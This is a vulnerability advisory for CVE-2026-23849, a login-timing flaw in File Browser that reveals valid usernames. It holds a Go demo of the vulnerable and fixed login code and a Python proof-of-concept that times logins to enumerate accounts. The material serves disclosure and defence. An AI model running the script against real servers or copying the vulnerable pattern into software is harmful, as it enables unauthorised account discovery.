Security Vulnerability Report
CVE-2026-23849 CVSS 5.3 MEDIUM


Published: 2026-01-19 21:15:52
Last Modified: 2026-02-03 14:30:45

Description

File Browser provides a file managing interface within a specified directory and can be used to upload, delete, preview, rename, and edit files. Prior to version 2.55.0, the JSONAuth.Auth function contains a logic flaw that allows unauthenticated attackers to enumerate valid usernames by measuring the response time of the /api/login endpoint. The vulnerability exists due to a "short-circuit" evaluation in the authentication logic. When a username is not found in the database, the function returns immediately. However, if the username does exist, the code proceeds to verify the password using bcrypt (users.CheckPwd), which is a computationally expensive operation designed to be slow. This difference in execution path creates a measurable timing discrepancy. Version 2.55.0 contains a patch for the issue.
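The two code paths the description contrasts, as an added Go example that is neither File Browser's code nor the project's actual patch: AuthVulnerable returns before any hashing when the username is unknown, while AuthHardened always runs exactly one expensive comparison (against a dummy record when the user does not exist) and returns a single generic error for both failure cases. The iterated SHA-256 in slowHash, the in-memory userTable, the dummyUser record and the hashOps return value are assumptions made for this demonstration; they stand in for bcrypt and users.CheckPwd and are not a production password hash.

```go
package main

import (
	"crypto/sha256"
	"crypto/subtle"
	"errors"
	"fmt"
	"time"
)

// slowHash stands in for bcrypt (assumption: it only models the cost
// asymmetry the advisory describes). Iterated SHA-256 is deliberately
// expensive here; it is not a password hash to use in production.
const hashRounds = 100000

func slowHash(salt, password string) []byte {
	sum := sha256.Sum256([]byte(salt + "\x00" + password))
	for i := 1; i < hashRounds; i++ {
		sum = sha256.Sum256(sum[:])
	}
	return sum[:]
}

type storedUser struct {
	salt string
	hash []byte
}

// Constructed in-memory user table with a single account (assumption).
var userTable = map[string]storedUser{
	"admin": {salt: "salt-admin", hash: slowHash("salt-admin", "correct horse")},
}

// dummyUser is what the hardened path verifies against when the username is
// unknown, so that a failed lookup costs the same as a real password check.
var dummyUser = storedUser{salt: "salt-dummy", hash: slowHash("salt-dummy", "never-a-valid-password")}

var errBadCredentials = errors.New("invalid credentials")

// checkPwd plays the role of users.CheckPwd: true when password hashes to u.hash.
func checkPwd(u storedUser, password string) bool {
	return subtle.ConstantTimeCompare(slowHash(u.salt, password), u.hash) == 1
}

// AuthVulnerable reproduces the short-circuit: an unknown username returns
// before any hashing, so it answers measurably faster than a known one.
// hashOps reports how many expensive comparisons ran, for the demo and tests.
func AuthVulnerable(username, password string) (hashOps int, err error) {
	u, ok := userTable[username]
	if !ok {
		return 0, errBadCredentials // fast path: no hash work at all
	}
	if !checkPwd(u, password) {
		return 1, errBadCredentials // slow path: full hash cost
	}
	return 1, nil
}

// AuthHardened performs one expensive comparison on every call and returns
// the same error for "no such user" and "wrong password".
func AuthHardened(username, password string) (hashOps int, err error) {
	u, ok := userTable[username]
	if !ok {
		u = dummyUser // pay the same cost as the known-user path
	}
	match := checkPwd(u, password)
	if !ok || !match { // an unknown user is rejected even if the dummy matched
		return 1, errBadCredentials
	}
	return 1, nil
}

// timeAuth measures one login attempt with a wrong password.
func timeAuth(fn func(string, string) (int, error), username string) time.Duration {
	start := time.Now()
	fn(username, "wrong_password")
	return time.Since(start)
}

func main() {
	for _, name := range []string{"admin", "nobody"} {
		fmt.Printf("%-8s vulnerable=%v hardened=%v\n", name,
			timeAuth(AuthVulnerable, name), timeAuth(AuthHardened, name))
	}
}
```

Running main prints the elapsed time for a known and an unknown username on each path: on the vulnerable path the unknown user returns almost instantly while the known user pays the full hash cost, on the hardened path both pay it. This page does not state how the 2.55.0 patch equalises the two paths; the dummy-compare pattern shown here is the usual mitigation for the CWE-208 timing discrepancy the record lists, and the shared error string closes the corresponding message-based oracle.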

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:* - VULNERABLE
File Browser (filebrowser) < 2.55.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests
import time
import statistics

TARGET_URL = "http://target-server/api/login"
TEST_USERNAMES = ["admin", "user", "test", "guest", "root"]
NUM_REQUESTS = 10


def measure_response_time(username):
    """Measure average response time for a username"""
    times = []
    for _ in range(NUM_REQUESTS):
        start = time.time()
        response = requests.post(TARGET_URL, json={
            "username": username,
            "password": "wrong_password"
        })
        end = time.time()
        times.append(end - start)
    return statistics.mean(times)


def enumerate_usernames():
    """Enumerate valid usernames using timing attack"""
    results = {}
    for username in TEST_USERNAMES:
        avg_time = measure_response_time(username)
        results[username] = avg_time
        print(f"Username: {username}, Avg Time: {avg_time:.4f}s")

    # Identify likely valid usernames (longer response time)
    threshold = statistics.mean(results.values()) + statistics.stdev(results.values())
    valid_usernames = [u for u, t in results.items() if t > threshold]
    print(f"\nLikely valid usernames: {valid_usernames}")
    return valid_usernames


if __name__ == "__main__":
    enumerate_usernames()

References

https://github.com/filebrowser/filebrowser/commit/24781badd413ee20333aba5cce1919d676e01889 (Patch)
https://github.com/filebrowser/filebrowser/security/advisories/GHSA-43mm-m3h2-3prc (Exploit, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-23849", "sourceIdentifier": "[email protected]", "published": "2026-01-19T21:15:51.653", "lastModified": "2026-02-03T14:30:45.250", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "File Browser provides a file managing interface within a specified directory and can be used to upload, delete, preview, rename, and edit files. Prior to version 2.55.0, the JSONAuth. Auth function contains a logic flaw that allows unauthenticated attackers to enumerate valid usernames by measuring the response time of the /api/login endpoint. The vulnerability exists due to a \"short-circuit\" evaluation in the authentication logic. When a username is not found in the database, the function returns immediately. However, if the username does exist, the code proceeds to verify the password using bcrypt (users.CheckPwd), which is a computationally expensive operation designed to be slow. This difference in execution path creates a measurable timing discrepancy. Version 2.55.0 contains a patch for the issue."}, {"lang": "es", "value": "El Navegador de Archivos proporciona una interfaz de gestión de archivos dentro de un directorio especificado y puede ser utilizado para subir, eliminar, previsualizar, renombrar y editar archivos. Antes de la versión 2.55.0, la función JSONAuth. Auth contiene un fallo lógico que permite a atacantes no autenticados enumerar nombres de usuario válidos midiendo el tiempo de respuesta del endpoint /api/login. La vulnerabilidad existe debido a una evaluación de 'cortocircuito' en la lógica de autenticación. Cuando un nombre de usuario no se encuentra en la base de datos, la función devuelve inmediatamente. Sin embargo, si el nombre de usuario sí existe, el código procede a verificar la contraseña usando bcrypt (users.CheckPwd), que es una operación computacionalmente costosa diseñada para ser lenta. Esta diferencia en la ruta de ejecución crea una discrepancia de tiempo medible. La versión 2.55.0 contiene un parche para el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-208"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-203"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:filebrowser:filebrowser:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.55.0", "matchCriteriaId": "36CB8D4B-1DFD-4F56-81BD-E31B346B0CE5"}]}]}], "references": [{"url": "https://github.com/filebrowser/filebrowser/commit/24781badd413ee20333aba5cce1919d676e01889", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-43mm-m3h2-3prc", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}